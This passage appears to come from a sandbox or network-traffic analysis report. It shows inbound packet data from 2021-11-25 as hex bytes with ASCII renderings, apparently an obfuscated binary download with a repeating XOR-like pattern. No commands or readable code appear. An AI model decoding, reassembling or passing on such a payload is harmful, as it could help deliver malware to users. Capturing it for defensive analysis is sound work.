a7 c6 a1 c9 36 5d 1e 11 c6 f4 74 c6 d1 51 3a 57 3c 4b e6 25 5b 79 43 3d 3c 4b 83 9d 6d 56 c3 7d fb e9 fd ee 62 ea 64 ef 8a 0f 8b 8e 9e 5f 2f e5 da c9 4e 95 cd 6b 72 cf 74 ca c4 fd d9 49 1f 9e 6e c5 49 20 d2 df 70 c1 b7 13 Data Ascii: 8hn6U\nOQ0eqH@MGX6T(q$QT91&<r,P`@Cg&mP.nF}:S/U<HITl2ni_gd<Hi^,q`C?/tT1`1teT!G6gf6]tQ:W<K%[yC=<KmV}bd_/NkrtInI p
2021-11-25 15:51:48 UTC	691	IN	Data Raw: 88 06 a8 b5 62 e5 a6 4a ae a6 49 23 85 9d ca e0 26 0b 5d 71 64 e1 6c dd 6e c6 29 f2 db b7 fb e7 47 39 38 5f 9b d7 bb 07 a6 4b d9 4a 36 52 26 0a 7e 2e d4 c6 4d 28 3d c0 c6 fb a5 cc ac ba c3 73 19 aa c3 73 4f 15 b6 93 ed 98 46 ba b7 11 9c 52 ba 99 d0 d0 ee 07 6a d3 91 fd 3e 4d c2 f6 93 f8 8e 74 48 a4 d3 58 25 8f 57 02 6e c5 ce d4 8c 09 00 e8 4e 95 b6 90 1a 2b 9d d3 21 85 ee 04 db b4 94 65 76 31 fc 61 4c ae 85 9f e7 aa 83 91 34 6b 9d d2 07 5a 5a 8a eb 9d 32 6e 3c 47 cb 6d d2 df 3f cf cf 57 93 f9 50 91 5c f7 4b 2d 4a a2 0f b7 53 19 f0 02 86 18 45 3e 2c 7f d7 43 41 34 63 61 64 e3 b9 18 3d c2 df bf 2f e7 93 f9 c8 e1 6c d8 0e 33 31 eb 4d 2d 12 39 38 5a 72 c9 90 75 3e 4b ad 3d 5a 8d 1a 2d 52 99 48 a2 ff e8 a6 4e dc 37 93 fe 35 d1 0c c8 8e 72 ae a2 3f c8 96 66 e0 Data Ascii: bJI#&]qdln)G98_KJ6R&~.M(=ssOFRj>MtHX%WnN+!ev1aL4kZZ2n<Gm?WP\K-JSE>,CA4cad=/l31M-98Zru>K=Z-RHN75r?f
2021-11-25 15:51:48 UTC	695	IN	Data Raw: 89 f8 2e 31 bd 44 ef e7 eb cc 9b e1 90 46 8c 7d ee 74 86 5e a9 76 66 b5 6e 94 31 b7 6b 69 64 d7 36 0a 8f b3 7e 6a 92 38 05 69 64 d7 77 c6 a3 90 2a 34 2b ba c3 45 0a f6 37 86 44 c4 ad 6a 8f 94 3f af 76 70 8c 7e 71 0c 97 a2 3e 78 09 74 9a 2b b0 d4 99 a8 ee 44 ca b8 fe 2b a8 ea 64 b2 ff b2 cc dc 04 e7 9f 92 39 89 c1 11 e4 79 f9 b8 d8 93 9b e1 90 46 8c 48 ff be d4 95 a0 0d 10 4c ff be d2 88 5e a4 0a 93 b9 42 cb 59 3c 73 7d e2 7d f3 d0 83 d7 14 6a a2 17 f2 50 c6 a2 1f d9 19 e8 4c d2 eb a9 04 e7 fb 98 3e 19 f9 be d1 3c 07 00 b8 d8 88 44 c4 bc d1 2f d3 6d 6e f0 58 d6 9c 17 e5 ff 8d ca b2 dc 04 e7 9f 99 b9 58 d7 02 8d fd b3 7e 76 65 37 95 bd 50 d7 12 5a c7 3d 93 b8 fb d1 68 e1 90 32 34 2a 29 87 c4 ab 60 99 a8 e7 d8 fa 4f 23 b5 41 6f 1f c7 0e 6c 8a 54 c0 f2 3b f1 Data Ascii: .1DF}t^vfn1kid6~j8idw4+E7Dj?vp~q>xt+D+d9yFHL^BY<s}}jPL><D/mnXX~ve7PZ=h24)`O#AolT;
2021-11-25 15:51:48 UTC	699	IN	Data Raw: 86 2c 4b 19 9c 64 d7 77 87 af 13 8d be 79 8c 3c 73 85 aa 87 af ef b3 1d a6 7d 96 55 32 5a be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 1a 9f 9c 2c b4 47 d6 67 a0 9a bc 10 ae 66 31 63 55 32 5a be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 32 5a be b9 f3 31 a1 cf 9c d7 d3 33 22 f8 f1 c0 41 eb 48 34 f0 88 88 a9 04 e7 9f eb a9 04 e7 9f eb a9 04 e7 9f eb a9 04 e7 9f eb a9 0b e4 85 37 6b 08 90 27 77 ec 40 13 39 99 a4 02 bb ac 2e f4 43 6a 90 39 4c a2 58 a1 0f 32 d1 09 8b 14 9e 0b 86 8a a6 29 3b 2d 03 ef fa 10 53 1e 28 41 00 dd 86 2c 4b 19 9c 64 d7 77 87 af 13 8d 18 42 d9 20 d2 d5 4d 5e 37 bf 61 0c 04 94 23 c7 b0 17 e8 5d 17 25 03 d9 83 16 99 b4 5f Data Ascii: ,Kdwy<s}U2Z,Kdw,Kdw,Ggf1cU2Z,Kdw,Kdw,Kdw2Z13"AH47k'w@9.Cj9LX2);-S(A,KdwB M^7a#]%_
2021-11-25 15:51:48 UTC	703	IN	Data Raw: be b9 2c 4b 19 a3 f5 c2 c3 a2 23 88 2f 2c ca b1 21 4f 5e ae a7 00 5b 31 e3 6a 6a 9f d7 88 99 4a c1 bf f0 8d c7 b0 49 db 14 f0 c9 ae 53 73 2a 16 23 b5 22 32 5a be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 ac 1d 37 76 ae ca 8c 67 b7 44 e4 7b 6a 8e 29 ac 7a 7e 68 91 15 ef ce 9c fe d1 e0 87 97 73 d9 d8 fa 4f 23 b5 22 32 5a be f9 c5 40 7a e8 42 c8 fe a6 c2 58 ca 28 87 0b 05 96 e4 8c 55 cd cf 1b e3 6a 69 1f 96 aa 21 26 69 9b 3c bb b2 5c 5c 51 74 fc 49 0e 0c fb d1 68 e1 90 46 8c 3c 73 7d 96 55 32 5a be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d 86 b0 0a 6a 19 d9 39 a9 fb 97 91 8e be ef e5 cc 23 d5 12 6b 96 3c 19 f0 c9 20 5a c9 ab 77 f9 4d e1 15 Data Ascii: ,K#/,!O^[1jjJISs*#"2Z,Kdw,Kdw,Kdw,K7vgD{j)z~hsO#"2Z@zBX(Uji!&i<\\QtIhF<s}U2Z,Kdw,Kdwj9#k< ZwM
2021-11-25 15:51:48 UTC	707	IN	Data Raw: 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 8d 50 52 aa 6a 08 1f ab f6 b0 4e a0 97 25 6b 69 9b 0d b5 22 cd bf 82 22 c6 2e f4 40 96 b4 05 69 9b 38 dd 86 dd 41 a0 6e 17 4e 32 5a 55 f1 24 37 35 2c f3 bd ea ea ac 8c d8 42 17 97 35 55 b9 2c ab a6 f8 4a 51 9b 43 05 b0 24 bc b4 7d 24 b0 96 82 8e c2 c3 97 7f 1f ab c2 7d 00 dd 45 bd a6 7d 56 07 fa 4f 9b 3d 0d 7e ad df 71 78 b1 de ea 27 0d b1 f5 c2 63 9b 1d a6 df 43 f5 c2 6f b8 40 7d 37 24 d4 f0 ad c5 b1 18 86 e5 6e f0 af db 76 04 7e d8 1c 23 24 f6 a9 04 51 f4 ce e1 3d 37 74 ff 7f 24 e9 a4 d8 42 5b 41 91 75 65 5a 35 5f b3 1d 2a fd 23 b5 af a4 9a 5f d3 d7 a9 04 7e a2 ab 09 e0 a7 3d f6 c1 ed 76 04 66 71 a2 73 ff 71 ab 09 fc ff 15 92 c7 e8 e4 18 99 7d 56 b4 08 59 94 50 19 2f Data Ascii: Kdw,Kdw,KPRjN%ki"".@i8AnN2ZU$75,B5U,JQC$}$}E}VO=~qx'cCo@}7$nv~#$Q=7t$B[AueZ5_*#_~=vfqsq}VYP/
2021-11-25 15:51:48 UTC	711	IN	Data Raw: 50 16 4b 19 1e 81 fb d1 f5 56 c9 54 39 65 3f fb 5b d8 81 a0 e1 12 79 8c b2 19 f3 bd a6 f8 13 8d 25 32 12 0a 71 ed fc 54 68 9f cc dc a7 84 72 fa e8 58 fd d6 64 ab 63 55 b1 67 28 41 89 c1 20 2d 56 cc 8f c3 d6 86 6b 69 f7 a9 4d 1e a5 81 fc 54 26 48 cd 5e 4e dd da ff 5d 31 92 4b 9a 37 b7 27 33 b7 65 5a 32 3c 32 5a 3a 0a b2 9b 59 44 aa 87 0d 12 38 69 f6 30 6a e6 8d d9 43 05 e2 66 e0 0e 8b d9 49 14 8e 27 85 aa 15 cd 63 55 b3 41 39 ec af 48 a2 73 f8 1c 0b 79 f3 14 d6 f5 be 11 5d 46 f6 e1 41 00 a7 5d 8f c3 3f 5a 7d 96 2c d5 b7 27 cb c5 8b b9 55 97 6a e6 6c 7f 20 2d bd a3 42 82 53 a6 de 09 1a 8e fb d1 06 7c a5 fa 27 31 6d 6e 9e e1 32 5a d8 7c bf 3b 83 20 b6 a5 8e c2 50 a5 85 22 be b9 41 85 34 5f 27 3d 60 cd 26 99 87 af 68 41 47 0f f5 5e b4 a0 14 9a 35 e2 6a 6e 84 Data Ascii: PKVT9e?[y%2qThrXdcUg(A -VkiMT&H^N]1K7'3eZ2<2Z:YD8i0jCfI'cUA9Hsy]FA]?Z},'Ujl -BS\|'1mn2Z\|; P"A4_'=`&hAG^5jn
2021-11-25 15:51:48 UTC	715	IN	Data Raw: 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 44 c7 4f 23 95 e5 9a 5f 6b 7f 9b e1 b0 d6 f5 c2 e3 85 aa 87 b0 62 d2 eb 88 01 5f 4b 06 02 e2 13 92 eb a9 04 c7 37 e7 9f f4 c1 40 7d 89 d0 e6 1d 87 8b b9 2c 54 f4 40 7d 88 c9 54 af 32 4e a0 6e ee 80 1d a6 63 65 5a be 98 56 b4 a0 70 d2 eb a9 19 64 d7 77 a7 07 6e f0 2b 3b f1 b8 b6 d5 72 fa 6f 9f eb a9 18 7e 18 19 87 d7 77 87 8f 17 97 d7 6c 99 dc 04 fd 22 32 5a 9e a5 fa 4f 39 01 5f 4b 00 11 88 31 f8 8a 37 e7 86 ef b3 1d bf 2b c9 54 8e 65 5a be a0 67 5f 4b 01 9b e1 90 66 7c 13 8d a6 c0 be b9 34 37 e7 9f cb d9 7c 13 95 ef b3 1d b1 e4 18 19 bc cc dc 04 f0 7e 18 19 8b 89 b4 a0 4e d8 fa Data Ascii: ,Kdw,Kdw,Kdw,Kdw,KDO#_kb_K7@},T@}T2NnceZVpdwn+;ro~wl"2ZO9_K17+TeZg_Kf\|47\|~N
2021-11-25 15:51:48 UTC	720	IN	Data Raw: 0f f3 99 98 d3 25 ba af 05 08 f4 cb 11 e0 2a 02 6b 21 b0 96 43 60 c8 59 74 ff db 81 a1 f0 36 72 3a 6b ae 51 28 45 03 64 d7 61 96 50 62 d2 eb be 49 11 01 17 97 d7 77 17 b3 99 57 7f 9b e1 86 c3 40 f4 08 f1 b8 b2 e5 9f 60 85 aa 87 b7 02 e7 16 5c cb 99 5f 03 64 d7 77 0f a7 7b 1c 6b 69 64 cf fb d4 79 c4 c8 d2 eb 21 94 d4 7b d9 5e 23 b5 22 36 eb 41 c9 67 3f df df 00 95 8a 13 c9 df c7 1f 8f 8f 48 dd a6 59 78 80 55 32 5a a9 c8 d7 fa 07 46 a8 c6 44 cf 23 91 8c b1 50 95 f6 01 d6 bd 7e 3c 37 6a ae 91 c8 d2 eb 91 ec 68 26 74 be cd 5e 98 7e 64 54 e7 cf 47 4b 90 0e 00 dd 82 c5 a2 2b ed e2 98 12 6a c2 97 5a f6 85 99 99 84 03 38 e0 42 82 22 2b c5 57 bc f8 b5 dd 71 bb 24 c8 d2 eb b1 39 e1 1d ee 31 d8 fa c7 a3 74 b7 2f f7 8b 30 1d 6a 2a 8a fb 1d 6a 2a 8a fb 12 55 12 ce 62 Data Ascii: %k!C`Yt6r:kQ(EdaPbIwW@`\_dw{kidy!{^#"6Ag?HYxU2ZFD#P~<7jh&t^~dTGK+jZ8B"+Wq$91t/0jj*Ub
2021-11-25 15:51:48 UTC	724	IN	Data Raw: 2c 4b 19 9c 64 d7 d7 77 87 af 13 81 a0 6e 80 1d 02 c2 67 47 ab 09 d7 8f 60 3d 55 da 5c 23 16 c4 6b a1 50 15 32 ca 77 0f 23 35 42 ea 87 a7 5f 4b 19 9c 64 ff db 81 f0 36 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 Data Ascii: ,KdwngG`=U\#kP2w#5B_Kd6dw,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw
2021-11-25 15:51:48 UTC	727	IN	Data Raw: 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 c2 ce e6 1d 59 9d 61 1c dc ab 90 1e d7 df 13 d5 8d 04 4d 76 fb 03 a1 8e be 66 0d e5 7b 4f f9 7c 01 40 61 41 00 dd 86 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 80 92 c4 47 8b e6 42 dd 32 2e 24 43 b3 6b 1f dd 10 78 74 82 68 78 90 df 8b b9 2c 4b 08 a6 26 63 ce c0 a6 75 7d 18 76 4d e1 3e f6 21 4f ba d0 ab f6 ca ae aa 78 a3 6d 38 96 88 f9 4f 55 55 6c d0 e6 1d a6 7d 96 55 32 5a be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 c9 c8 4e 3c 96 05 39 bc 4b 54 e3 d9 83 fc 0e 5c 3c 17 f0 5f b4 d3 1a 67 a7 84 59 bd f6 e2 b8 07 60 5f dc 9f d8 b6 e0 4e 57 86 a5 99 23 46 45 ae 6e 09 af ad f1 56 6b a9 fb 1f 1d 37 18 b2 0f d3 aa 24 a3 af 16 42 c9 7f 9b e1 90 46 Data Ascii: dw,KdwYaMvf{O\|@aA,Kdw,Kdw,KGB2.$Ckxthx,K&cu}vM>!Oxm8OUUl}U2Z,Kdw,KdN<9KT\<_gY`_NW#FEnVk7$BF
2021-11-25 15:51:48 UTC	731	IN	Data Raw: 11 da 00 7d e5 d4 39 76 70 a6 21 c3 c1 13 15 c7 36 5a 52 e7 ef 86 d3 3a 10 40 82 b2 1e 71 87 03 e5 c0 41 bd bf 5d b9 89 38 0a 09 00 4a c2 3c e1 52 c5 b7 84 ea 5b ce 8f 44 d3 6e c9 1c 08 f1 b8 aa 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 f4 68 c0 a7 01 26 6c cc 23 cf 32 73 82 a5 99 9c 9b 6d 08 b0 69 ea 4f 62 2d 5e af 2c b4 32 05 54 78 8a 43 4c 7b e9 07 35 1d 26 97 8d 41 66 56 f2 c4 92 3c 3a 91 51 53 7c ec 83 d9 35 1d 09 08 b3 e2 a3 75 c3 ba 07 ff 91 37 42 29 9b 1e 81 6f f1 47 cf 86 bb b0 fe 26 6c eb a9 04 e7 9f eb a9 04 e7 9f eb a9 04 e7 9f eb a9 04 e7 9f eb a9 04 e7 9f eb a9 04 e7 9f eb a9 04 e7 9f eb e7 d1 00 59 80 4a cc 8b 46 00 81 8e be ca 9c 45 f5 b3 51 0f 7c 92 17 af ec ad 54 9b 16 Data Ascii: }9vp!6ZR:@qA]8J<R[Dn,Kdw,Kdw,Kdh&l#2smiOb-^,2TxCL{5&AfV<:QS\|5u7B)oG&lYJFEQ\|T
2021-11-25 15:51:48 UTC	747	IN	Data Raw: 44 a9 04 e7 99 f8 4a 96 35 72 fa 4f 23 b5 16 30 34 2b a8 e6 74 d1 68 e1 92 fb d1 68 bc 54 af 13 8d be 8a 13 ec 58 d8 9e 00 f3 bd 36 64 cf 63 55 6f bb 31 d8 fa 4f 11 ac ed da 9e 0d 17 b9 2c 4b 19 6c eb a9 58 61 50 a5 9b 95 b3 79 f4 6e f0 36 66 34 5f 4b 40 8d be b9 2c 2c 29 a0 14 75 f8 6e 91 bc d5 16 66 f2 3b f1 ba 33 dd 86 7b c5 4a 96 34 2b a8 e6 6f 5d 46 8c 3e bc b4 a0 3a fe 59 3c 00 a9 65 33 ba 81 a0 6e f0 3a 6e f0 62 56 b4 a0 1d c2 aa e1 f7 e9 a4 78 09 20 2d ce b5 12 0a f6 45 0a ac c5 12 2e 04 b5 61 7e 18 19 9c 6c eb a9 50 8d be b9 2c 4b 40 34 07 4a c2 91 8b 97 d7 77 87 a7 ff db d5 52 aa 87 af 52 eb e0 56 90 12 58 fa 61 50 a5 fa 47 0f 83 f1 a0 6e f0 36 64 96 1c 7b b5 76 56 f7 e9 a4 78 09 7c 13 8d ea 37 e7 9f eb a9 5e 8b e1 b4 f4 12 49 3a 6e f0 36 6c eb Data Ascii: DJ5rO#04+thhTX6dcUo1O,KlXaPyn6f4_K@,,)unf;3{J4+o]F>:Y<e3n:nbVx -E.a~lP,K@4JwRRVXaPGn6d{vVx\|7^I:n6l
2021-11-25 15:51:48 UTC	759	IN	Data Raw: f3 42 01 a0 91 34 47 e7 bf 1f ff 52 e6 35 c6 91 41 4c ab 2d b2 12 32 7e 5c 4a 96 55 27 c7 6b ed 25 ba ef 97 b3 9e 21 e0 2a 02 6b 21 b0 96 50 b5 06 68 6c a3 95 f6 01 d6 bd 36 64 d6 e5 be 3d 7b d9 0c df cf ea 6f 73 7d 96 d5 56 30 d8 b2 40 4f 21 5b 40 ce e5 ee 31 d8 fa 15 51 15 11 c0 b0 e3 6a 63 55 32 4f 4b 3d 6a 6d 22 32 5a ab 69 40 e9 2f 9f eb a9 11 f8 6e 4c 10 05 69 71 68 c5 ce 68 a9 c0 8d f6 45 0a a2 b2 9e e2 5b a1 db c9 54 af 37 f4 a8 82 22 27 97 6f 24 64 97 1b 6d a2 bf f7 0b b5 ee fd 29 3b 0b 64 3f fb d1 68 e2 2b ed ea e0 5e ec 68 68 a9 24 13 c1 cd 16 24 13 c1 c9 1c 1b e2 98 12 2e 14 86 64 17 a4 3d f2 78 6a ae 5d b9 d3 97 9e 81 80 39 a0 e3 dd 8d cb 90 c3 0d 7e 18 19 9b a1 d4 b4 67 17 b3 39 a8 0b 3d 36 64 d3 64 f7 e3 d1 af 2b ed ea ae d5 72 fa 4f 22 8a Data Ascii: B4GR5AL-2~\JU'k%!*k!Phl6d={os}V0@O![@1QjcU2OK=jm"2Zi@/nLiqhhE[T7"'o$dm);d?h+^hh$$.d=xj]9~g9=6dd+rO"
2021-11-25 15:51:48 UTC	775	IN	Data Raw: 92 4b 19 9c 6c eb a9 02 c2 f4 64 b6 d1 09 10 6c c5 4a 95 d2 eb a9 02 e2 13 84 67 5f 4b 19 9c 17 e4 7a 20 2d cd 5e c8 d2 e9 a4 78 09 44 87 af 13 ec 58 d8 9e 47 0f 80 1d a6 7d 97 d7 77 9e 79 8c 3c 73 09 0c 9e 1d 88 31 db 81 a0 6e f8 4a 96 50 dd b0 b2 fa 3b 90 22 5b 6f 73 7e 18 19 9c 6c eb a9 05 15 a6 59 5d 32 3b 95 bb 1f ab 0a f6 45 0a fe 59 3c 71 ac b9 08 90 32 3b 95 bb 1f ab 0a f6 45 0a fe 59 3c 75 be 8e 65 3b 85 cb 3d 9f c5 4a 95 d2 eb a9 02 e2 13 84 67 5f 4b 19 9c 17 e4 7a 20 2d cd 5e c8 d2 e9 a4 78 09 44 87 af 13 ec 58 d8 9e 47 0f 80 1d a6 7d 97 d7 77 9e 61 50 a5 fa 3b 89 d1 1c 0d 7e 1b a1 f0 36 6c eb a9 01 31 ee 15 f3 c9 35 86 45 24 37 e4 18 19 9c 6c eb a9 05 1d 92 6f 12 7e 79 e8 4b 37 e7 9c 64 d7 77 8f c3 45 08 3d c3 61 31 ac ed ca be 97 d7 74 ff db Data Ascii: KldlJg_Kz -^xDXG}wy<s1nJP;"[os~lY]2;EY<q2;EY<ue;=Jg_Kz -^xDXG}waP;~6l15E$7lo~yK7dwE=a1t
2021-11-25 15:51:48 UTC	791	IN	Data Raw: 4b 19 ec 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 c9 54 ae 91 c8 d2 eb a9 04 e7 70 f5 c2 c3 45 0a f6 45 e2 8c 6e f1 4b 19 98 5a be b9 2c 4b 19 9c 8c 3c 73 7d 96 55 32 5a 59 69 64 d6 f5 c2 c3 45 0a f6 45 ed ae 91 c8 d2 eb a9 04 78 5b 41 01 5f 4b 19 9c 64 d7 77 18 19 9c 64 d7 77 87 af 9a c0 ec 2d 3d f6 41 00 dd 86 2c 4b 19 9c ed ae 91 c8 d2 eb a9 04 66 8e 41 01 5f 4b 19 9c 64 d7 77 06 ec 2c 4b 19 9c 64 d7 07 6e f0 36 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 30 55 33 dd 86 2c 4b 19 9c 64 83 a5 fa 4f 23 b5 22 32 62 82 22 33 dd 86 2c 4b 19 9c 64 ef b3 1d a6 7d 96 55 32 6d 6e f0 36 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 37 e7 9e 69 64 d7 77 87 af 13 ea 27 bf 3b f1 b8 aa 87 b3 1d a6 7d 96 55 32 5a be b9 2c 4b 19 9c 64 d7 77 d4 f0 37 e7 9f eb a9 04 e7 9c 34 Data Ascii: K,Kdw,KTpEEnKZ,K<s}U2ZYidEEx[A_Kdwdw-=A,KfA_Kdw,Kdn6dw,K0U3,KdO#"2b"3,Kd}U2mn6dw,K7idw';}U2Z,Kdw74
2021-11-25 15:51:48 UTC	807	IN	Data Raw: 81 8d ca a4 17 ff f4 32 3f 8f b0 f7 aa e4 7b f6 6a 90 23 d1 1b d2 84 55 51 07 54 ec 2c 3f 89 d7 58 cd 2c 28 6c df bd 41 2d b9 4b 77 ee 5c ec 58 d0 81 8d 8d c8 ff ef 85 dd ab 7e 7f f5 ab 64 f8 29 b6 d6 da 89 d1 0c 88 42 ed dc 67 70 cf 20 2c 4b 19 9d e6 1d a6 7c 12 0b 78 09 79 82 d9 7d 97 d7 77 86 2b c9 56 b4 a0 6f 32 5a be b9 2d ce 82 0c 9e 11 ed da 96 3b 98 39 ec 2c 3f 89 d7 58 cd 2c 28 6c df bd 41 2d b9 4b 77 ee 5c ec 58 d0 81 8d 8d c8 ff ef 85 dd ab 7e 7f f5 ab 64 f8 29 b6 d6 da 89 d1 0c 88 42 ed dc 67 70 cf 20 2c 4b 19 9d e6 1d a6 7c 12 0b 78 09 79 82 d9 7d 97 d7 77 87 fb d1 6a e6 1d a6 27 be b8 aa 84 25 bb 26 3f 2d d8 f9 76 77 84 b0 bc 37 5a cb 8f bb 32 02 ec 2f 89 dc bf 50 09 0b dc 07 34 73 75 12 13 8e 11 89 b5 ac 8f c3 45 0a f6 24 0b 59 dc 06 e5 9a Data Ascii: 2?{j#UQT,?X,(lA-Kw\X~d)Bgp ,K\|xy}w+Vo2Z-;9,?X,(lA-Kw\X~d)Bgp ,K\|xy}wj'%&?-vw7Z2/P4suE$Y
2021-11-25 15:51:48 UTC	823	IN	Data Raw: 87 bf 04 e7 9f eb a9 04 e7 9f e8 22 32 5a be d8 c6 eb a9 04 84 09 44 b6 d5 14 50 f1 ea 64 f8 3e 0a 95 fd a2 01 3c 5e fc 62 a5 d7 00 ba c1 29 a9 2b bd 5f 2c 66 ef c5 67 6b 5f 3c 5e bf 5c ad 67 32 75 e1 e2 60 e2 65 3f 9f 98 29 ab 7b f2 14 35 a1 f1 b8 93 f4 35 8c 5b 7c 77 f3 ce cc fc 66 93 e0 2e 37 ca f7 f3 8b 94 66 e4 60 f0 5e ab 7b f0 5b 6c cb 3a 07 1c 46 e2 76 63 68 84 49 61 24 5a 93 ed 9a 69 09 59 1c 11 a6 44 a9 30 75 c1 60 98 14 48 90 4e a0 6e e3 bb 31 dc 04 e7 9f 51 28 41 00 dd 86 4d 22 4a 46 8f ca d7 77 87 64 df 8a 37 b8 f5 96 06 a5 b6 fa 0c b4 ec 69 36 3b be fd 83 e0 5d 16 4b 5c 8e 08 a5 b4 f5 90 19 c3 47 0f f1 d9 14 6c ed af 10 05 69 64 d7 16 28 39 3d f5 cb 59 3c 73 b6 a2 72 fa 10 5a fa 01 1a 41 54 fc 1d ea 78 4a d9 30 10 57 68 ae d5 27 fa 1c 73 22 Data Ascii: "2ZDPd><^b)+_,fgk_<^\g2u`e?){55[\|wf.7f`^{[l:FvchIa$ZiYD0u`HNn1Q(AM"JFwd7i6;]K\Glid(9=Y<srZATxJ0Wh's"
2021-11-25 15:51:48 UTC	839	IN	Data Raw: 77 f5 b6 cb 36 07 75 d2 7a 0c fb d1 65 fd bf 3a 6e 95 bb 5a d1 07 0d 65 5a be aa 6b 69 64 d2 bc d3 6c eb cc b5 49 7b fe 1a 75 e1 f1 cc 8f dc 04 e7 92 dc 98 5b 41 00 dd 86 2c 4b 19 67 5f 4b 19 9c 05 55 29 44 e0 0f 83 c0 cc a9 68 88 50 c3 36 03 3b 85 d8 95 a2 16 66 83 fa 56 b4 a0 2e c1 42 d0 e7 82 22 32 5a be d8 c6 d6 e6 03 64 a8 32 cb 5a ec 2d d3 6d 6e fc 56 b4 a0 6e f0 57 0b 63 be a5 ba 3e 7a 0e 00 db cd 68 e0 0e 72 8e 22 54 dd e3 e5 81 df 3b 60 ce e1 90 4d 62 e7 9e 69 01 32 33 a9 77 fe 2a 5d 46 8c 2e ce e1 90 43 42 b6 a4 78 6c 82 49 7b fe 3a 74 ff db 8d ad 92 4a 96 55 32 5a be b9 2c 9d e6 1d a6 7d f7 fb cb f9 fe 58 b9 49 7d fd b9 43 66 83 d1 01 31 b1 47 76 70 9c 16 61 33 b8 d9 23 ea 3e 78 09 7f ca f4 41 00 89 f2 30 55 32 5a b5 13 af 12 0a 82 41 75 f0 42 Data Ascii: w6uze:nZeZkidlI{u[A,Kg_KU)DhP6;fV.B"2Zd2Z-mnVnWc>zhr"T;`Mbi23w*]F.CBxlI{:tJU2Z,}XI}Cf1Gvpa3#>xA0U2ZAuB
2021-11-25 15:51:48 UTC	855	IN	Data Raw: 66 db 85 a8 82 56 da 96 75 e5 f4 2f bf 3e 7c 11 88 45 64 be bc b0 94 50 d1 06 85 8a 53 48 ff bc dd f5 ac f9 ec 58 cb 36 0c 88 36 66 de 09 00 b3 74 df ec 42 ed c2 e3 f2 55 5d 2a 43 0d 7c 13 f9 a2 1a 3e 1c 46 e2 74 96 26 52 df ab 6e 9e 06 80 3d 91 a6 12 66 db 89 b6 a5 fa 4f 90 65 5e c8 a6 22 57 4d 77 f4 43 05 1b c0 d6 96 53 2c 49 14 0f 83 a5 fa 4f 23 b5 22 32 5e e7 9f eb a9 04 86 10 15 92 4b 7a 20 41 6c 8f b7 55 51 07 1a 6c 88 1e 5c b1 7b bc 80 2b be 94 27 d8 94 39 81 8f b7 4e c7 62 e1 e6 30 61 66 ab 24 40 1a 70 9c 09 5b 22 40 0e 2f a5 9f 8f b0 e5 f5 b0 f5 ed 94 13 8c 3c 4a af 66 b2 fc 69 00 a9 77 aa a7 cd 11 a5 da 98 77 a7 cb 6f 5e fe 61 28 7c 7b f2 49 75 ef 9e 49 77 ee 43 60 a3 90 21 8d db ef c6 b9 41 2d ee 05 5f 26 11 a8 b0 b8 93 e3 a1 d0 a5 da aa c9 13 Data Ascii: fVu/>\|EdPSHX66ftBU]*C\|>Ft&Rn=fOe^"WMwCS,IO#"2^Kz AlUQl\{+'9Nb0af$@p["@/<Jfiwwo^a(\|{IuIwC`!A-_&
2021-11-25 15:51:48 UTC	870	IN	Data Raw: 96 54 b0 18 16 d4 75 82 22 6d fa 4a 1d dc 71 bd bf 76 c8 5b 08 23 30 7d 7a 8d f6 16 42 d5 27 eb e8 77 c6 cd 41 0f 40 26 1c e7 1c 6b 69 64 d7 76 bc 77 dc 24 f3 3e 30 55 32 5a be ba 68 a9 c4 f9 c3 31 da 76 4c 9b e1 a1 12 1f 20 65 58 30 1d 7d 13 c5 4a 96 64 08 e4 93 85 aa 87 ab df 63 96 dc 4c 5a 37 af 13 8d a6 fc bc b4 a0 6f 73 c4 e8 ce 62 9a 0c fb d1 68 e1 90 46 8c 3c 73 7d 96 55 32 5a be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 